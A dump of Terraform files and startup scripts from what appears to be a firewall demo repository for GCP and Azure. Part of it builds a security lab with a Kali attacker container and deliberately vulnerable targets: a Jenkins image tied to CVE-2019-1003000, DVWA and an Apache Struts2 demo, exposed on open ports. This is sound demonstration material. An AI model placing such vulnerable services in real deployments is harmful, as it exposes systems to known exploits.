--------------------------------------------------------------------------------
/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl:
--------------------------------------------------------------------------------
 1 | #cloud-config
 2 | 
 3 | runcmd:
 4 |   - sudo apt-get update -y
 5 |   - sudo apt-get install -y php
 6 |   - sudo apt-get install -y apache2
 7 |   - sudo apt-get install -y libapache2-mod-php
 8 |   - sudo rm -f /var/www/html/index.html
 9 |   - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php
10 |   - sudo systemctl restart apache2


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/Guide.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/GP-NoAutoScaling/Guide.pdf


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=FW-1
 8 | dns-primary=
 9 | dns-secondary=
10 | op-command-modes=mgmt-interface-swap
11 | dhcp-send-hostname=yes
12 | dhcp-send-client-id=yes
13 | dhcp-accept-server-hostname=yes
14 | dhcp-accept-server-domain=yes
15 | 


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/bootstrap-portal/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | hostname=FW-1
 8 | dns-primary=
 9 | dns-secondary=
10 | op-command-modes=mgmt-interface-swap
11 | dhcp-send-hostname=yes
12 | dhcp-send-client-id=yes
13 | dhcp-accept-server-hostname=yes
14 | dhcp-accept-server-domain=yes
15 | 


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/bootstrap-portal/null.txt:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/gcp_firewall.tf:
--------------------------------------------------------------------------------
 1 | resource "google_compute_firewall" "management" {
 2 |   name    = "management-firewall"
 3 |   project = google_project.globalprotect.number
 4 |   network = google_compute_network.management_network.name
 5 |   allow {
 6 |     protocol = "tcp"
 7 |     ports    = ["22", "443"]
 8 |   }
 9 | }
10 | resource "google_compute_firewall" "untrust" {
11 |   name    = "untrust-firewall"
12 |   project = google_project.globalprotect.number
13 |   network = google_compute_network.untrust_network.name
14 |   allow {
15 |     protocol = "tcp"
16 |     ports    = ["443"]
17 |   }
18 |   allow {
19 |     protocol = "udp"
20 |     ports    = ["500","4500","4501"]
21 |   }
22 |   allow {
23 |     protocol = "esp"
24 |   }
25 | }
26 | resource "google_compute_firewall" "trust" {
27 |   name    = "trust-firewall"
28 |   project = google_project.globalprotect.number
29 |   network = google_compute_network.trust_network.name
30 |   allow {
31 |     protocol = "all"
32 |   }
33 | }


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/images/GP_in_GCP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/GP-NoAutoScaling/images/GP_in_GCP.png


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/main.tf:
--------------------------------------------------------------------------------
1 | provider "google" {}
2 | 
3 | provider "random" {}


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/output.tf:
--------------------------------------------------------------------------------
 1 | output "Portal-Management-IP" {
 2 |   value = "${google_compute_instance.portal.network_interface.1.access_config.0.nat_ip}"
 3 | }
 4 | 
 5 | output "Gateway1-Management-IP" {
 6 |   value = "${google_compute_instance.gateway1.network_interface.1.access_config.0.nat_ip}"
 7 | }
 8 | 
 9 | output "Gateway2-Management-IP" {
10 |   value = "${google_compute_instance.gateway2.network_interface.1.access_config.0.nat_ip}"
11 | }


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/project.tf:
--------------------------------------------------------------------------------
 1 | resource "random_id" "random_number" {
 2 |   byte_length = 2
 3 | }
 4 | resource "google_project" "globalprotect" {
 5 |   name                = "${var.Base_Project_Name}-${random_id.random_number.hex}"
 6 |   project_id          = "${var.Base_Project_Name}-${random_id.random_number.hex}"
 7 |   billing_account     = var.Billing_Account
 8 |   auto_create_network = false
 9 | }
10 | resource "google_project_service" "globalprotect" {
11 |   project                    = google_project.globalprotect.number
12 |   service                    = "storage-api.googleapis.com"
13 |   disable_dependent_services = true
14 | }
15 | 
16 | data "google_compute_zones" "available" {
17 |   project = google_project.globalprotect.project_id
18 |   region  = var.GCP_Region
19 | }


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/terraform.tfvars:
--------------------------------------------------------------------------------
 1 | Billing_Account = "<Billing ID>"
 2 | 
 3 | Base_Project_Name = "<Base Project Name>"
 4 | 
 5 | Public_Key_Path = "~/.ssh/id_rsa.pub"
 6 | 
 7 | GCP_Region = "<Region>"
 8 | 
 9 | #FW_PanOS = "byol-904"              # Uncomment for PAN-OS 9.0.4 - BYOL
10 | FW_PanOS  = "bundle1-904"           # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1
11 | #FW_PanOS = "bundle2-904"           # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2
12 | 
13 | FW_Image  = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries"
14 | 
15 | 
16 | Management_Subnet_CIDR = "10.0.0.0/24"
17 | 
18 | Untrust_Subnet_CIDR = "10.0.1.0/24"
19 | 
20 | Trust_Subnet_CIDR = "10.0.2.0/24"
21 | 
22 | FW_Machine_Type = "n1-standard-4"


--------------------------------------------------------------------------------
/gcp/GP-NoAutoScaling/variables.tf:
--------------------------------------------------------------------------------
 1 | variable Billing_Account {}
 2 | variable Base_Project_Name {}
 3 | variable Public_Key_Path {}
 4 | variable GCP_Region {}
 5 | variable Management_Subnet_CIDR {}
 6 | variable Untrust_Subnet_CIDR {}
 7 | variable Trust_Subnet_CIDR {}
 8 | variable FW_Machine_Type {}
 9 | variable FW_PanOS {}
10 | variable FW_Image {}


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/README.md:
--------------------------------------------------------------------------------
1 | Jenkins_proj
2 | Jenkins Project
3 | 


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/bootstrap/init-cfg.txt:
--------------------------------------------------------------------------------
1 | dns-primary=8.8.8.8
2 | dns-secondary=8.8.4.4
3 | op-command-modes=mgmt-interface-swap


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/bootstrap/null.txt:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/gcp_vars.tf:
--------------------------------------------------------------------------------
 1 | variable "Billing_Account" {
 2 | }
 3 | 
 4 | variable "Blue_Team_Name" {
 5 | }
 6 | 
 7 | variable "Red_Team_Name" {
 8 | }
 9 | 
10 | variable "GCP_Region" {
11 | }
12 | 
13 | variable "GCP_Zone" {
14 | }
15 | 
16 | variable "Management_Subnet_CIDR" {
17 | }
18 | 
19 | variable "Untrust_Subnet_CIDR" {
20 | }
21 | 
22 | variable "Trust_Subnet_CIDR" {
23 | }
24 | 
25 | variable "Attacker_Subnet_CIDR" {
26 | }
27 | 
28 | variable "FW_Mgmt_IP" {
29 | }
30 | 
31 | variable "FW_Untrust_IP" {
32 | }
33 | 
34 | variable "FW_Trust_IP" {
35 | }
36 | 
37 | variable "WebLB_IP" {
38 | }
39 | 
40 | variable "Webserver_IP1" {
41 | }
42 | 
43 | variable "Webserver_IP2" {
44 | }
45 | 
46 | variable "Attacker_IP" {
47 | }
48 | 
49 | variable "Server_Initscript_Path" {
50 | }
51 | 
52 | variable "Attacker_Initscript_Path" {
53 | }
54 | 
55 | variable "HC_Request_Path" {
56 | }
57 | 
58 | variable "Content_Bucket" {
59 | }
60 | 
61 | variable "Public_Key" {
62 |   description = "Entire path to public SSH key file.  If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin"
63 | }
64 | 


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/main.tf:
--------------------------------------------------------------------------------
 1 | provider "google" {
 2 |   region = var.GCP_Region
 3 |   version     = "3.13.0"
 4 | }
 5 | 
 6 | provider "google-beta" {
 7 |   version     = "3.13.0"
 8 | }
 9 | 
10 | provider "random" {
11 | }


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/output.tf:
--------------------------------------------------------------------------------
 1 | output "FW_Mgmt_IP" {
 2 |   value = google_compute_instance.firewall.network_interface[1].access_config[0].nat_ip
 3 | }
 4 | 
 5 | output "NGFW_LB" {
 6 |   value = google_compute_global_forwarding_rule.firewalls.ip_address
 7 | }
 8 | 
 9 | output "NATIVE_LB" {
10 |   value = google_compute_global_forwarding_rule.webservers.ip_address
11 | }
12 | 
13 | output "ATTACKER_IP" {
14 |   value = google_compute_instance.attacker.network_interface[0].access_config[0].nat_ip
15 | }
16 | 
17 | 


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/scripts/initialize_attacker.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  attacker:" >> docker-compose.yml
 9 | echo "    image: pglynn/kali:latest" >> docker-compose.yml
10 | echo "    ports:" >> docker-compose.yml
11 | echo "      - \"443:443\"" >> docker-compose.yml
12 | echo "      - \"5000:5000\"" >> docker-compose.yml
13 | docker-compose up -d
14 | usermod -aG docker ubuntu
15 | 


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/scripts/initialize_dvwa.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  struts:" >> docker-compose.yml
 9 | echo "    image: vulnerables/web-dvwa" >> docker-compose.yml
10 | echo "    ports:" >> docker-compose.yml
11 | echo "      - \"8080:80\"" >> docker-compose.yml
12 | docker-compose up -d
13 | usermod -aG docker ubuntu
14 | 


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/scripts/initialize_jenkins.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  jenkins:" >> docker-compose.yml
 9 | echo "    image: her0ma/cve-2019-1003000" >> docker-compose.yml
10 | echo "    ports:" >> docker-compose.yml
11 | echo "      - \"50000:50000\"" >> docker-compose.yml
12 | echo "      - \"8080:8080\"" >> docker-compose.yml
13 | docker-compose up -d
14 | usermod -aG docker ubuntu
15 | 


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/scripts/initialize_kali.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  attacker:" >> docker-compose.yml
 9 | echo "    image: pglynn/kali-rolling:latest" >> docker-compose.yml
10 | echo "    ports:" >> docker-compose.yml
11 | echo "      - \"443:443\"" >> docker-compose.yml
12 | echo "    stdin_open: true" >> docker-compose.yml
13 | echo "    tty: true" >> docker-compose.yml
14 | docker-compose up -d
15 | usermod -aG docker ubuntu
16 | 


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/scripts/initialize_struts.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  struts:" >> docker-compose.yml
 9 | echo "    image: pglynn/apache-struts2-demo:latest" >> docker-compose.yml
10 | echo "    ports:" >> docker-compose.yml
11 | echo "      - \"8080:8080\"" >> docker-compose.yml
12 | docker-compose up -d
13 | usermod -aG docker ubuntu
14 | 


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/scripts/initialize_webserver.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev docker-compose -y --force-yes
 5 | cd /var/tmp
 6 | echo "version: '2'" > docker-compose.yml
 7 | echo "services:" >> docker-compose.yml
 8 | echo "  jenkins:" >> docker-compose.yml
 9 | echo "    image: pglynn/jenkins:latest" >> docker-compose.yml
10 | echo "    environment:" >> docker-compose.yml
11 | echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
12 | echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
13 | echo "    ports:" >> docker-compose.yml
14 | echo "      - \"50000:50000\"" >> docker-compose.yml
15 | echo "      - \"8080:8080\"" >> docker-compose.yml
16 | docker-compose up -d
17 | usermod -aG docker ubuntu
18 | 


--------------------------------------------------------------------------------
/gcp/Jenkins-sans-Panhandler/versions.tf:
--------------------------------------------------------------------------------
1 | terraform {
2 |   required_version = ">= 0.12"
3 | }


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/.pan-cnc/login/docker_cmd.j2:
--------------------------------------------------------------------------------
 1 | To authenticate to GCP, please run the following command:
 2 | 
 3 | Make sure you have a .config directory in you home directory
 4 | On either OSX or Windows if the .config directory does not exist in your home directory:
 5 | 
 6 | command from terminal or powershell in user home directory:
 7 | mkdir .config
 8 | 
 9 | 
10 | Mac OSX- From a terminal window:
11 | docker run -ti --rm -v $HOME/.config:/root/.config google/cloud-sdk gcloud auth application-default login
12 | 
13 | Windows- from a powershell:
14 | docker run -ti -p 8888:80 --rm -v /c/Users/%USERNAME%/.config:/root/.config google/cloud-sdk gcloud auth application-default login
15 | 
16 | This command will display a link that you should copy into your browser. This will then display a verification
17 | code that you use to authenticate this machine.
18 | 
19 | 
20 | For more information, see the Google Cloud SDK guide here:
21 | 
22 | https://cloud.google.com/sdk/gcloud/
23 | 
24 | And for more information on authenticating, see here:
25 | https://cloud.google.com/sdk/gcloud/reference/auth/application-default/login
26 | 


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/README.md:
--------------------------------------------------------------------------------
1 | Jenkins_proj
2 | Jenkins Project
3 | 


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/init-cfg.txt:
--------------------------------------------------------------------------------
1 | dns-primary=8.8.8.8
2 | dns-secondary=8.8.4.4
3 | op-command-modes=mgmt-interface-swap


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInDeploy/bootstrap/null.txt:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInDeploy/gcp_vars.tf:
--------------------------------------------------------------------------------
 1 | variable "Billing_Account" {}
 2 | variable "Victim_Project_Name" {}
 3 | variable "Attacker_Project_Name" {}
 4 | variable "GCP_Region" {}
 5 | variable "GCP_Zone" {}
 6 | variable "Management_Subnet_CIDR" {}
 7 | variable "Untrust_Subnet_CIDR" {}
 8 | variable "Trust_Subnet_CIDR" {}
 9 | variable "Attacker_Subnet_CIDR" {}
10 | variable "FW_Mgmt_IP" {}
11 | variable "FW_Untrust_IP" {}
12 | variable "FW_Trust_IP" {}
13 | variable "WebLB_IP" {}
14 | variable "Webserver_IP1" {}
15 | variable "Webserver_IP2" {}
16 | variable "Attacker_IP" {}


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInDeploy/initialize_attacker.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  attacker:" >> docker-compose.yml
10 | echo "    image: pglynn/kali:latest" >> docker-compose.yml
11 | echo "    ports:" >> docker-compose.yml
12 | echo "      - \"443:443\"" >> docker-compose.yml
13 | echo "      - \"5000:5000\"" >> docker-compose.yml
14 | docker-compose up -d


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInDeploy/initialize_webserver.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  jenkins:" >> docker-compose.yml
10 | echo "    image: pglynn/jenkins:version1.0" >> docker-compose.yml
11 | echo "    environment:" >> docker-compose.yml
12 | echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
13 | echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
14 | echo "    ports:" >> docker-compose.yml
15 | echo "      - \"50000:50000\"" >> docker-compose.yml
16 | echo "      - \"8080:8080\"" >> docker-compose.yml
17 | docker-compose up -d


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInDeploy/main.tf:
--------------------------------------------------------------------------------
1 | provider "google" {
2 |   region = "${var.GCP_Region}"
3 | }
4 | 
5 | provider "random" {}


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInDeploy/output.tf:
--------------------------------------------------------------------------------
 1 | output "FW_Mgmt_IP" {
 2 |   value = "${google_compute_instance.firewall.network_interface.1.access_config.0.nat_ip}"
 3 | }
 4 | 
 5 | output "ALB-DNS" {
 6 |   value = "${google_compute_global_forwarding_rule.firewalls.ip_address}"
 7 | }
 8 | 
 9 | output "NATIVE-DNS" {
10 |   value = "${google_compute_global_forwarding_rule.webservers.ip_address}"
11 | }
12 | 
13 | output "ATTACKER_IP" {
14 |   value = "${google_compute_instance.attacker.network_interface.0.access_config.0.nat_ip}"
15 | }
16 | 


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_attacker.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  attacker:" >> docker-compose.yml
10 | echo "    image: pglynn/kali:latest" >> docker-compose.yml
11 | echo "    ports:" >> docker-compose.yml
12 | echo "      - \"443:443\"" >> docker-compose.yml
13 | echo "      - \"5000:5000\"" >> docker-compose.yml
14 | docker-compose up -d


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInDeploy/scripts/initialize_webserver.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | apt-get update
 3 | apt-get update
 4 | apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes
 5 | pip3 install docker-compose
 6 | cd /var/tmp
 7 | echo "version: '3'" > docker-compose.yml
 8 | echo "services:" >> docker-compose.yml
 9 | echo "  jenkins:" >> docker-compose.yml
10 | echo "    image: pglynn/jenkins:latest" >> docker-compose.yml
11 | echo "    environment:" >> docker-compose.yml
12 | echo "      JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml
13 | echo "      JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml
14 | echo "    ports:" >> docker-compose.yml
15 | echo "      - \"50000:50000\"" >> docker-compose.yml
16 | echo "      - \"8080:8080\"" >> docker-compose.yml
17 | docker-compose up -d
18 | 


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInDeploy/terraform.tfvars:
--------------------------------------------------------------------------------
 1 | Billing_Account = "<billing Account Number>"
 2 | 
 3 | Attacker_Project_Name = "attacker"
 4 | 
 5 | Victim_Project_Name = "jenkins"
 6 | 
 7 | GCP_Region = "us-central1"
 8 | 
 9 | GCP_Zone = "us-central1-a"
10 | 
11 | Management_Subnet_CIDR = "10.0.0.0/24"
12 | 
13 | Untrust_Subnet_CIDR = "10.0.1.0/24"
14 | 
15 | Trust_Subnet_CIDR = "10.0.2.0/24"
16 | 
17 | Attacker_Subnet_CIDR = "10.1.1.0/24"
18 | 
19 | FW_Mgmt_IP = "10.0.0.10"
20 | 
21 | FW_Untrust_IP = "10.0.1.10"
22 | 
23 | FW_Trust_IP = "10.0.2.10"
24 | 
25 | WebLB_IP = "10.0.2.30"
26 | 
27 | Webserver_IP1 = "10.0.2.50"
28 | 
29 | Webserver_IP2 = "10.0.2.60"
30 | 
31 | Attacker_IP = "10.1.1.50"


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf:
--------------------------------------------------------------------------------
1 | variable "FW_Mgmt_IP" {}
2 | variable "FW_Untrust_IP" {}
3 | variable "Webserver_IP1" {}
4 | variable "Webserver_IP2" {}
5 | variable "WebLB_IP" {}
6 | variable "Admin_Username" {}
7 | variable "Admin_Password" {}


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars:
--------------------------------------------------------------------------------
 1 | Admin_Username = "<Admin Username>"
 2 | 
 3 | Admin_Password = "<Admin Password>"
 4 | 
 5 | FW_Untrust_IP = "10.0.1.10"
 6 | 
 7 | WebLB_IP = "10.0.2.30"
 8 | 
 9 | Webserver_IP1 = "10.0.2.50"
10 | 
11 | Webserver_IP2 = "10.0.2.60"


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/gcp_login.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | """
 3 | gloud_login
 4 | Runs the shell command to invoke login.
 5 | The login process creates a new browser window for interactive login.
 6 | The login process updates the gloud auth files in ~/.config/gcloud
 7 | Files updated are:
 8 |     access_tokens.db
 9 |     config_sentinel
10 |     credentials.db
11 | 
12 | The login process stores credentials in sqlite3 in ~/.config/gcloud/credentials.db
13 | 
14 | https://www.jhanley.com/google-cloud-where-are-my-credentials-stored/
15 | 
16 | """
17 | 
18 | def gcloud_login():
19 |     cmd = 'gcloud auth login'
20 |     os.system(cmd)
21 | 
22 | if __name__ == '__main__':
23 |     gcloud_login()
24 | 


--------------------------------------------------------------------------------
/gcp/Jenkins_proj-master/requirements.txt:
--------------------------------------------------------------------------------
 1 | google-api-core==1.11.1
 2 | google-auth==1.6.3
 3 | google-cloud-core==1.0.1
 4 | google-cloud-storage==1.16.1
 5 | google-resumable-media==0.3.2
 6 | googleapis-common-protos==1.6.0
 7 | pan-python==0.14.0
 8 | pandevice==0.11.0  
 9 | python-terraform==0.10.0
10 | requests==2.21.0
11 | urllib3==1.24.2
12 | xmltodict==0.12.0
13 | 


--------------------------------------------------------------------------------
/gcp/README.md:
--------------------------------------------------------------------------------
1 | Terraform for GCP
2 | 


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/bootstrap_files/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/bootstrap_files/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | dhcp-accept-server-hostname=yes
 8 | dns-primary=8.8.8.8
 9 | dns-secondary=4.2.2.2
10 | op-command-modes=mgmt-interface-swap


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/bootstrap_files_ilbnh/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | dhcp-accept-server-hostname=yes
 8 | dns-primary=8.8.8.8
 9 | dns-secondary=4.2.2.2
10 | op-command-modes=mgmt-interface-swap


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/deleteme:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/guide.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv-peering-with-lbnh/guide.pdf


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/ilbnh_override.tf:
--------------------------------------------------------------------------------
1 | #************************************************************************************
2 | # ILBNH
3 | #************************************************************************************
4 | variable "enable_ilbnh" {
5 |   description = "If set to true, enable ILB as Next Hop"
6 |   default     = true
7 | }
8 | 


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/images/Overview.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv-peering-with-lbnh/images/Overview.png


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/images/peering.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv-peering-with-lbnh/images/peering.png


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/images/routes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv-peering-with-lbnh/images/routes.png


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/images/web.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv-peering-with-lbnh/images/web.jpg


--------------------------------------------------------------------------------
/gcp/adv-peering-with-lbnh/scripts/webserver-startup.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | until sudo apt-get update; do echo "Retrying"; sleep 2; done
3 | until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
4 | until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done
5 | until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done
6 | until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
7 | until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
8 | until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
9 | 


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke/bootstrap_files/authcodes:
--------------------------------------------------------------------------------
1 |  


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke/bootstrap_files/init-cfg.txt:
--------------------------------------------------------------------------------
 1 | type=dhcp-client
 2 | ip-address=
 3 | default-gateway=
 4 | netmask=
 5 | ipv6-address=
 6 | ipv6-default-gateway=
 7 | dhcp-accept-server-hostname=yes
 8 | dns-primary=8.8.8.8
 9 | dns-secondary=4.2.2.2
10 | op-command-modes=mgmt-interface-swap


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke/guide.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv_peering_2fw_2spoke/guide.pdf


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke/images/diagram.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv_peering_2fw_2spoke/images/diagram.png


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke/images/directory.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv_peering_2fw_2spoke/images/directory.png


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke/images/peering.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv_peering_2fw_2spoke/images/peering.png


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke/images/routes.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv_peering_2fw_2spoke/images/routes.png


--------------------------------------------------------------------------------
/gcp/adv_peering_2fw_2spoke/images/web.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wwce/terraform/9aee9eadfb3b8102328460bd20f6eb280a33ae18/gcp/adv_peering_2fw_2spoke/images/web.png


--------------------------------------------------------------------------------
